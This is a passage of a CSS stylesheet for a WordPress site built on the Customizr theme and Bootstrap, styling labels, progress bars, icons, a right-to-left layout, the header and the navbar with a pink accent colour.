0.2s ease-in-out; transition: all 0.2s ease-in-out; } a.thumbnail:hover, a.thumbnail:focus { border-color: #e67fb9; -webkit-box-shadow: 0 1px 4px rgba(0, 105, 214, 0.25); -moz-box-shadow: 0 1px 4px rgba(0, 105, 214, 0.25); box-shadow: 0 1px 4px rgba(0, 105, 214, 0.25); } .thumbnail > img { display: block; max-width: 100%; margin-left: auto; margin-right: auto; } .thumbnail .caption { padding: 9px; color: #555555; } .label, .badge { display: inline-block; padding: 2px 4px; font-size: 11.844px; font-weight: bold; line-height: 14px; color: #ffffff; vertical-align: baseline; white-space: nowrap; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #999999; } .label { -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .badge { padding-left: 9px; padding-right: 9px; -webkit-border-radius: 9px; -moz-border-radius: 9px; border-radius: 9px; } .label:empty, .badge:empty { display: none; } a.label:hover, a.label:focus, a.badge:hover, a.badge:focus { color: #ffffff; text-decoration: none; cursor: pointer; } .label-important, .badge-important { background-color: #b94a48; } .label-important[href], .badge-important[href] { background-color: #953b39; } .label-warning, .badge-warning { background-color: #f89406; } .label-warning[href], .badge-warning[href] { background-color: #c67605; } .label-success, .badge-success { background-color: #468847; } .label-success[href], .badge-success[href] { background-color: #356635; } .label-info, .badge-info { background-color: #3a87ad; } .label-info[href], .badge-info[href] { background-color: #2d6987; } .label-inverse, .badge-inverse { background-color: #333333; } .label-inverse[href], .badge-inverse[href] { background-color: #1a1a1a; } .btn .label, .btn .badge { position: relative; top: -1px; } .btn-mini .label, .btn-mini .badge { top: 0; } @-webkit-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @-moz-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @-ms-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @-o-keyframes progress-bar-stripes { from { background-position: 0 0; } to { background-position: 40px 0; } } @keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } .progress { overflow: hidden; height: 20px; margin-bottom: 20px; background-color: #f7f7f7; background-image: -moz-linear-gradient(top, #f5f5f5, #f9f9f9); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f5f5f5), to(#f9f9f9)); background-image: -webkit-linear-gradient(top, #f5f5f5, #f9f9f9); background-image: -o-linear-gradient(top, #f5f5f5, #f9f9f9); background-image: linear-gradient(to bottom, #f5f5f5, #f9f9f9); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5' , endColorstr='#fff9f9f9' , GradientType=0); -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1); -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1); box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1); -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .progress .bar { width: 0%; height: 100%; color: #ffffff; float: left; font-size: 12px; text-align: center; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #0e90d2; background-image: -moz-linear-gradient(top, #149bdf, #0480be); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#149bdf), to(#0480be)); background-image: -webkit-linear-gradient(top, #149bdf, #0480be); background-image: -o-linear-gradient(top, #149bdf, #0480be); background-image: linear-gradient(to bottom, #149bdf, #0480be); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff149bdf' , endColorstr='#ff0480be' , GradientType=0); -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15); -moz-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15); box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15); -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; -webkit-transition: width 0.6s ease; -moz-transition: width 0.6s ease; -o-transition: width 0.6s ease; transition: width 0.6s ease; } .progress .bar + .bar { -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15); -moz-box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15); box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15); } .progress-striped .bar { background-color: #149bdf; background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent)); background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); -webkit-background-size: 40px 40px; -moz-background-size: 40px 40px; -o-background-size: 40px 40px; background-size: 40px 40px; } .progress.active .bar { -webkit-animation: progress-bar-stripes 2s linear infinite; -moz-animation: progress-bar-stripes 2s linear infinite; -ms-animation: progress-bar-stripes 2s linear infinite; -o-animation: progress-bar-stripes 2s linear infinite; animation: progress-bar-stripes 2s linear infinite; } .progress-danger .bar, .progress .bar-danger { background-color: #dd514c; background-image: -moz-linear-gradient(top, #ee5f5b, #c43c35); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ee5f5b), to(#c43c35)); background-image: -webkit-linear-gradient(top, #ee5f5b, #c43c35); background-image: -o-linear-gradient(top, #ee5f5b, #c43c35); background-image: linear-gradient(to bottom, #ee5f5b, #c43c35); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffee5f5b' , endColorstr='#ffc43c35' , GradientType=0); } .progress-danger.progress-striped .bar, .progress-striped .bar-danger { background-color: #ee5f5b; background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent)); background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); } .progress-success .bar, .progress .bar-success { background-color: #5eb95e; background-image: -moz-linear-gradient(top, #62c462, #57a957); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#62c462), to(#57a957)); background-image: -webkit-linear-gradient(top, #62c462, #57a957); background-image: -o-linear-gradient(top, #62c462, #57a957); background-image: linear-gradient(to bottom, #62c462, #57a957); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff62c462' , endColorstr='#ff57a957' , GradientType=0); } .progress-success.progress-striped .bar, .progress-striped .bar-success { background-color: #62c462; background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent)); background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); } .progress-info .bar, .progress .bar-info { background-color: #4bb1cf; background-image: -moz-linear-gradient(top, #5bc0de, #339bb9); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#5bc0de), to(#339bb9)); background-image: -webkit-linear-gradient(top, #5bc0de, #339bb9); background-image: -o-linear-gradient(top, #5bc0de, #339bb9); background-image: linear-gradient(to bottom, #5bc0de, #339bb9); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de' , endColorstr='#ff339bb9' , GradientType=0); } .progress-info.progress-striped .bar, .progress-striped .bar-info { background-color: #5bc0de; background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent)); background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); } .progress-warning .bar, .progress .bar-warning { background-color: #faa732; background-image: -moz-linear-gradient(top, #fbb450, #f89406); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#fbb450), to(#f89406)); background-image: -webkit-linear-gradient(top, #fbb450, #f89406); background-image: -o-linear-gradient(top, #fbb450, #f89406); background-image: linear-gradient(to bottom, #fbb450, #f89406); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffbb450' , endColorstr='#fff89406' , GradientType=0); } .progress-warning.progress-striped .bar, .progress-striped .bar-warning { background-color: #fbb450; background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent)); background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); } .accordion { margin-bottom: 20px; margin-top: 10px; } .accordion-group { margin-bottom: 2px; border: 1px solid #e5e5e5; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .accordion-heading { border-bottom: 0; } .accordion-heading .accordion-toggle { display: block; padding: 8px 15px; } .accordion-toggle { cursor: pointer; } .accordion-inner { padding: 9px 15px; border-top: 1px solid #e5e5e5; } /********************************************************************************* ************************** Utility classes**************************************** **********************************************************************************/ .pull-right { float: right; } .pull-left { float: left; } .hide { display: none; } .show { display: block; } .invisible { visibility: hidden; } .affix { position: fixed; } /********************************************************************************* ******************************* Customizr ************************************** **********************************************************************************/ /***** CUSTOM CUSTOMIZR CONTENT **** => ELEMENTS & TYPES => LAYOUT STUFFS => ICONS => HEADER => LOGO/TITLE => NAVBAR => MENU => SOCIAL => BREADCRUMB => SLIDER => FEATURED PAGES => POST STUFF => POST THUMBNAILS => WP SPECIFICS => FOOTER => ADMIN BAR => MEDIA PRINT => DEBUG ***** END OF CONTENT *****/ /* ELEMENTS --------------------------------------------------- */ body { padding-bottom: 0px; color: #5a5a5a; background: #fafafa; background-image: none; direction: rtl; unicode-bidi: embed; } /* LINKS HOVER EFFECT */ .tc-fade-hover-links a:not([class*=round-div]), .tc-fade-hover-links a:visited, .tc-fade-hover-links button, .tc-fade-hover-links input[type="button"], .tc-fade-hover-links input[type="submit"] { -webkit-transition-property: border, background, color; transition-property: border, background, color; -webkit-transition-duration: .15s; transition-duration: .15s; -webkit-transition-timing-function: ease-in-out; transition-timing-function: ease-in-out; } .tc-fade-hover-links a:not([class*=round-div]), .tc-fade-hover-links a:visited, .tc-fade-hover-links button, .tc-fade-hover-links input[type="button"], .tc-fade-hover-links input[type="submit"] { -webkit-transition-property: border, background, color; transition-property: border, background, color; -webkit-transition-duration: .15s; transition-duration: .15s; -webkit-transition-timing-function: ease-in-out; transition-timing-function: ease-in-out; } .tc-fade-hover-links a.btn:focus, .tc-fade-hover-links a.btn:hover { text-decoration: none; background-position: 0 -15px; -webkit-transition: background-position 0.1s linear; -moz-transition: background-position 0.1s linear; -o-transition: background-position 0.1s linear; transition: background-position 0.1s linear; } /* External Links style */ a + span.tc-external:after { font-family: 'genericons'; font-size: 1.25em; color: #e67fb9; content: "\f442"; speak: none; font-style: normal; font-variant: normal; text-transform: none; line-height: 0; padding-left: 0; position: relative; text-decoration: none!important; top: 5px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } ul, ol { padding: 0px 5px; } input, textarea, .uneditable-input { width: 80%; } section { word-wrap: break-word; } table { border-bottom: 5px solid rgba(230, 127, 185, 0.5); border-collapse: collapse; border-spacing: 0; font-size: 14px; line-height: 2; margin: 0 0 20px; width: 100%; } th { font-weight: bold; border-bottom: 1px solid rgba(230, 127, 185, 0.5); } td { border-top: 1px solid #ededed; padding: 6px 10px 6px 0; } /* LAYOUT STUFFS --------------------------------------------------- */ /* FIX MARGIN LEFT FOR SPAN12 CONTENT */ .row-fluid [class*="tc-content span12"], .row-fluid [class*="tc-thumbnail span12"] { margin-left: 0!important; } .row-fluid .span8 { padding-left: 1%; } /* ICONS -------------------------------------------------- */ /*@font-face { font-family: 'genericons'; src: url( 'fonts/fonts/genericons-regular-webfont.eot' ); src: url( 'fonts/fonts/genericons-regular-webfont.eot?#iefix' ) format( 'embedded-opentype' ), url( 'fonts/fonts/genericons-regular-webfont.woff' ) format( 'woff' ), url( 'fonts/fonts/genericons-regular-webfont.ttf' ) format( 'truetype' ), url( 'fonts/fonts/genericons-regular-webfont.svg#genericonsregular' ) format( 'svg' ); } @font-face { font-family: 'entypo'; src: url( 'fonts/fonts/entypo.eot' ); src: url( 'fonts/fonts/entypo.eot?#iefix' ) format( 'embedded-opentype' ), url( 'fonts/fonts/entypo.woff' ) format( 'woff' ), url( 'fonts/fonts/entypo.ttf' ) format( 'truetype' ), url( 'fonts/fonts/entypo.svg#genericonsregular' ) format( 'svg' ); } */ [data-icon]:before { font-family: 'genericons'; content: attr(data-icon); speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; } .icon-bubble:before { font-family: 'genericons'; speak: none; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; } .icon-bubble:before { content: "\f300"; } /*SOCIAL ICONS*/ .social-block a:before { font-family: 'genericons'; speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; } .icon-google:before { content: "\f206"; } .icon-facebook:before { content: "\f204"; } .icon-twitter:before { content: "\f202"; } .icon-feed:before { content: "\f413"; } .icon-flux:before { content: "\f413"; } .icon-github:before { content: "\f200"; } .icon-dribbble:before { content: "\f201"; } .icon-pinterest:before { content: "\f209"; } .icon-youtube:before { content: "\f213"; } .icon-linkedin:before { content: "\f208"; } .icon-wordpress:before { content: "\f205"; } .icon-instagram:before { content: "\f215"; } .icon-flickr:before { content: "\f211"; } .icon-tumblr:before { content: "\f214"; } /*ICONS FOR WIDGETS*/ .widget h3:before { font-family: 'genericons'; color: #e67fb9; speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; padding-right: 5px; top: 8px; font-size: 1.5em; position: relative; line-height: 0px; } .widget_social h3:before { font-family: 'entypo'; top: 2px; font-size: 2em; content: "\E73C"; } .widget_categories h3:before { font-family: 'entypo'; top: 2px; font-size: 2em; content: "\1F4C1"; } /* hack for safari, uses the browser body.class added with a script */ .safari .widget_categories h3:before, .chrome .widget_categories h3:before { font-family: 'genericons'; top: 8px; font-size: 1.5em; content: '\f301'; } .widget_archive h3:before { font-family: 'entypo'; top: 2px; font-size: 2em; content: "\E800"; } .widget_tag_cloud h3:before { content: "\f302"; } .widget_recent_entries h3:before { font-family: 'entypo'; top: 2px; font-size: 2em; content: "\1F4E3"; } /* hack for safari, uses the browser body.class added with a script */ .safari .widget_recent_entries h3:before, .chrome .widget_recent_entries h3:before { font-family: 'genericons'; top: 8px; font-size: 1.5em; content: '\f403'; } .widget_meta h3:before { content: "\f442"; } /* hack to render white color icons if skin is grey */ .white-icons .widget h3:before { color: #FFF; } #footer .white-icons .widget li:before { color: #FFF; } .widget_calendar h3:before { content: "\f307"; } .widget_pages h3:before { font-family: 'entypo'; top: 2px; font-size: 2em; content: "\1F56A"; } /* hack for safari, uses the browser body.class added with a script */ .safari .widget_pages h3:before, .chrome .widget_pages h3:before { font-family: 'genericons'; top: 8px; font-size: 1.5em; content: '\f436'; } .widget_recent_comments h3:before { content: "\f108"; } .widget_search h3:before { content: "\f400"; } .widget_nav_menu h3:before { content: "\f419"; top: 4px; font-size: 1em; padding-right: 10px; } /*-- POST FORMATS AND ARCHIVE ICONS */ .format-icon:before { font-family: 'entypo'; speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; padding-right: 10px; font-size: 1.2em; opacity: 0.2; position: relative; top: 8px; } .entry-summary.format-icon:before, .entry-content.format-icon:before { font-family: 'entypo'; speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 7px; top: -26px; -webkit-font-smoothing: antialiased; padding-right: 13px; font-size: 6.0em; opacity: 0.3; position: relative; display: block; float: left; } article.page .format-icon:before { content: "\1F4C4"; font-size: 3em; line-height: 0px; position: relative; top: 14px; } /* hack for chrome and safari, uses the browser body.class added with a script */ .safari article.page .format-icon:before, .chrome article.page .format-icon:before { font-family: 'genericons'; content: "\f443"; font-size: 1.8em; line-height: 0px; position: relative; top: 20px; } article.format-standard .format-icon:before { font-family: 'genericons'; content: "\f411"; font-size: 1.5em; top: 12px; line-height: 25px; } article.format-gallery .format-icon:before, article.attachment .format-icon:before { content: "\1F304"; font-size: 3em; line-height: 0px; } /* hack for safari, uses the browser body.class added with a script */ .safari article.format-gallery .format-icon:before, .safari article.attachment .format-icon:before, .chrome article.format-gallery .format-icon:before, .chrome article.attachment .format-icon:before { font-family: 'genericons'; content: '\f102'; font-size: 1.8em; line-height: 0px; top: 15px; } article.format-aside .format-icon:before { content: "\1F504"; } /* hack for safari, uses the browser body.class added with a script */ .safari article.format-aside .format-icon:before, .chrome article.format-aside .format-icon:before { content: '\f308'; font-family: 'genericons'; font-size: 3.5em; top: -2px; } article.format-chat .format-icon:before { font-family: 'genericons'; content: "\f108"; } article.format-audio .format-icon:before { font-family: 'genericons'; content: "\f109"; font-size: 1.5em; top: 10px; } article.format-video .format-icon:before { content: "\1F3AC"; font-size: 3em; line-height: 0px; top: 10px; } /* hack for safari, uses the browser body.class added with a script */ .safari article.format-video .format-icon:before, .chrome article.format-video .format-icon:before { content: '\f104'; font-size: 2em; line-height: 0px; top: 20px; font-family: 'genericons'; } article.format-status .format-icon:before { content: "\26A1"; } article.format-quote .format-icon:before, article.error404 .format-icon:before { content: "\275E"; } article.format-image .format-icon:before { content: "\1F304"; font-size: 3em; line-height: 0px; } /* hack for ie */ .ie article.format-image .format-icon:before { font-size: 0.4em; } /* hack for safari, uses the browser body.class added with a script */ .safari article.format-image .format-icon:before, .chrome article.format-image .format-icon:before { font-family: 'genericons'; content: '\f102'; font-size: 1.8em; line-height: 0px; top: 15px; } article.format-link .format-icon:before { content: "\1F517"; top: -12px; } /* hack for safari + chrome, uses the browser body.class added with a script */ .safari article.format-link .format-icon:before, .chrome article.format-link .format-icon:before { font-family: 'genericons'; content: "\f107"; top: 7px; } /*ARCHIVES ICONS*/ .search .search-header .format-icon:before, .archive .archive-header .format-icon:before { color: #e67fb9; opacity: 1; line-height: 0.2em; } .search .search-header .format-icon:before { font-family: 'genericons'; content: "\f400"; } .archive.date .archive-header .format-icon:before { content: "\E800"; top: 3px; font-size: 1.8em; } .archive.category .archive-header .format-icon:before { top: 2px; font-size: 2em; content: "\1F4C1"; } /* hack for safari + chrome, uses the browser body.class added with a script */ .safari.archive.category .archive-header .format-icon:before, .chrome.archive.category .archive-header .format-icon:before { font-family: 'genericons'; top: 10px; font-size: 1.5em; content: '\f301'; } .archive.tag .archive-header .format-icon:before { font-family: 'genericons'; content: "\f302"; } .archive.author .archive-header .format-icon:before { font-family: 'genericons'; content: '\f304'; } /*--------OTHER ICONS-----------*/ /*comments*/ h3#reply-title:before { font-family: 'entypo'; content: "\2712"; speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; padding-right: 5px; font-size: 2em; } h2.comments-title:before { font-family: 'genericons'; content: "\f108"; speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; padding-right: 5px; font-size: 1em; } /* HEADER -------------------------------------------------- */ .tc-header { min-height: 45px; background: #ffffff; background-image: none; border-bottom: 10px solid #e9eaee; border-top: 5px solid #e67fb9; z-index: 200; } /* STICKY HEADER */ #tc-reset-margin-top { display: none; } /*.tc-sticky-header #tc-reset-margin-top { width: 100%; display: block; float: left; }*/ /* HEADER ALWAYS VISIBLE => z-index high */ .tc-no-sticky-header .tc-header { z-index: 100; position: relative; } .tc-sticky-header .tc-header { position: fixed; z-index: 100; /*height: 126px;*/ -webkit-transition: all 0.15s; -moz-transition: all 0.15s; -ms-transition: all 0.15s; -o-transition: all 0.15s; transition: all 0.15s; } .sticky-enabled .tc-header { height: auto!important; /* default fallback */ background: #ffffff transparent; /* nice browsers */ background: rgba(255, 255, 255, 0.8); /* IE 6/7 */ filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#CCFFFFFF, endColorstr=#CCFFFFFF)"; /* IE8 */ -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#CCFFFFFF, endColorstr=#CCFFFFFF)"; border-bottom: 2px solid #E9EAEE; border-top: 0px; } /* DISABLE SEMI-TRANSPARENCY FOR STICKY HEADER ON SCROLL*/ .tc-solid-color-on-scroll.sticky-enabled .tc-header, .tc-solid-color-on-scroll.sticky-enabled .navbar-inner { background-color: #FAFAFA; } /* SHOW HIDE ELEMENTS IN HEADER */ .sticky-enabled .tc-header .social-block { display: none; } .sticky-enabled .tc-tagline-off .site-description { display: none!important; } .sticky-enabled .tc-title-logo-off .brand { display: none; } .sticky-enabled .tc-menu-off .nav-collapse { display: none; } .sticky-enabled .navbar-wrapper { margin-top: 0px; } .sticky-enabled .tc-title-logo-off .navbar-wrapper { margin-left: 0px; } .sticky-enabled .navbar .nav > li > a { font-size: 14px; } .sticky-enabled .navbar .navbar-inner { margin: 8px 5px 5px 5px; background: none; min-height: 35px; } .sticky-enabled .brand h1, .sticky-enabled .brand a { margin: 10px 0px; } .sticky-enabled .nav-collapse { float: right; } /* RESIZE ON SCROLL IF SHRINK ON */ .tc-header .brand .site-title, .tc-header .brand .site-logo img { opacity: 1; -webkit-transition: all 0.15s; -moz-transition: all 0.15s; -ms-transition: all 0.15s; -o-transition: all 0.15s; transition: all 0.15s; } /* TRANSPARENT BACKGROUND ON CLICK WHEN STICKY ENABLED */ .sticky-enabled li.dropdown.active > .dropdown-toggle, .sticky-enabled .navbar .nav li.dropdown.open.active > .dropdown-toggle, .sticky-enabled .navbar .nav li.dropdown.open > .dropdown-toggle { background: none; } /* LOGO/TITLE -------------------------------------------------- */ .tc-header .brand { float: left; text-align: center; margin: 0px; padding: 0px; /* Increase vertical padding to match navbar links */ font-size: 16px; font-weight: bold; min-width: 250px\9; /* IE 8 and below */ } .tc-header .brand h1 { font-size: 40px; } .tc-header .brand a { text-decoration: none; margin: 10px 0; display: block; } /* LOGO CENTERED */ .tc-no-sticky-header .logo-centered .navbar-wrapper, .sticky-disabled .logo-centered .navbar-wrapper { float: none; margin: auto; clear: both; } .tc-no-sticky-header .logo-centered .brand, .sticky-disabled .logo-centered .brand { width: 100%; } .tc-header .outside { display: none; } /* IE9- hack */ .ie8 body > .container.outside, .ie7 body > .container.outside { display: none!important; } /* NAVBAR -------------------------------------------------- */ /* Special class on .container surrounding .navbar, used for positioning it into place. */ .navbar-wrapper { z-index: 200; position: relative; margin-top: 7px; margin-bottom: 0px; /* Negative margin to pull up carousel. 90px is roughly margins and height of navbar. */ } .navbar.resp { display: none; } .navbar .btn-navbar:hover, .navbar .btn-navbar:focus, .navbar .btn-navbar:active, .navbar .btn-navbar.active, .navbar .btn-navbar.disabled, .navbar .btn-navbar[disabled] { background-color: #da3f96; background-position: 0 -30px; } .navbar.notresp { display: block; min-width: 690px\9; /* IE 8 and below */ } .navbar { float: right; margin-bottom: 0px; } .navbar-inner { min-height: 43px; } /* Remove border and change up box shadow for more contrast */ .navbar .navbar-inner { z-index: 200; /* position: relative; */ margin: 5px 5px 11px; border: 0; -webkit-box-shadow: 0 2px 10px rgba(0, 0, 0, 0.25); -moz-box-shadow: 0 2px 10px rgba(0, 0, 0, 0.25); box-shadow: 0 2px 10px rgba(0, 0, 0, 0.25); padding-left: 5px; /*ie9 and less : hack to get rid of the gradient effect */ filter: progid:DXImageTransform.Microsoft.gradient(enabled=false); } /* Downsize the brand/project name a bit */ .navbar-wrapper .navbar h2 { float: right; padding-right: 5px; font-style: italic; line-height: 19px; text-align: right; color: #e67fb9; /* max-width: 240px; */ } /* NO NAVBAR */ .no-navbar .navbar .navbar-inner, .sticky-enabled .navbar .navbar-inner { background: none; background-image: none; background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(enabled=false); border: none; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } /* TRANSPARENT NAVBAR BACKGROUND */ .navbar-inner .nav-collapse .dropdown-menu > li > a:focus, .navbar-inner .nav-collapse .dropdown-menu > li > a:hover, .navbar-inner .nav-collapse .dropdown-submenu:focus > a, .navbar-inner .nav-collapse .dropdown-submenu:hover > a { background-color: rgba(0, 0, 0, 0.05); } h2.site-description { font-size: 18px; padding-top: 0px; line-height: 20px; font-style: italic; color: #e67fb9; } /* 1px hack for chrome to not loose the focus on menu item hovering */ .chrome .navbar .navbar-inner .nav li { line-height: 21px; } /* Navbar links: increase padding for taller navbar */ .navbar .nav > li > a { padding: 5px 20px 5px 20px; font-size: 16px; } .navbar .nav > li.current-menu-item > a, .navbar .nav > li.current-menu-ancestor > a { color: #e67fb9; } .navbar .nav > li.current-menu-item > a .caret, .navbar .nav li.current-menu-ancestor > a .caret, .navbar .nav li.dropdown.open > .dropdown-toggle .caret, .navbar .nav li.dropdown.current-menu-item > a .caret, .navbar .nav li.dropdown.current-menu-ancestor > a .caret, .navbar .nav li.dropdown.open.current-menu-ancestor > .dropdown-toggle .caret { border-top-color: #e67fb9; border-bottom-color: #e67fb9; } .navbar .nav li.dropdown .caret { border-top-color: #777777; border-bottom-color: #777777; } .dropdown-menu > li.current-menu-item > a, .dropdown-menu > li.current-menu-ancestor > a { text-decoration: none; color: #e67fb9; background-color: #f2f2f2; /*#gradient > 